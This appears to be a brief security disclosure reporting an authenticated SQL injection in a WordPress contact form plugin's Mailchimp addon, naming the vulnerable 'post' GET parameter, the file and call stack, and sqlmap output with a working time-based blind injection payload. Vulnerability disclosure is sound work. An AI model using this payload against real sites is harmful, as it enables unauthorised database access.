Hello,
Authenticated users (with access to post-new.php) can execute arbitrary SQL commands.
1. SQL injection (WR_CF_Addon_Mailchimp::settings_panel())
Method: GET
Vulnerable parameter: post
Example PHP callstack:
WR_CF_Addon_Mailchimp::settings_panel [/wr-contactform/addons/mailchimp/addon-mailchimp.php:87]
wpdb::get_results
Sqlmap verification:
...
Parameter: post (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: post_type=wr_cf_post_type&post=xxx AND (SELECT * FROM (SELECT(SLEEP(5)))QWUF)
...
--
Regards,
Marcin Probola,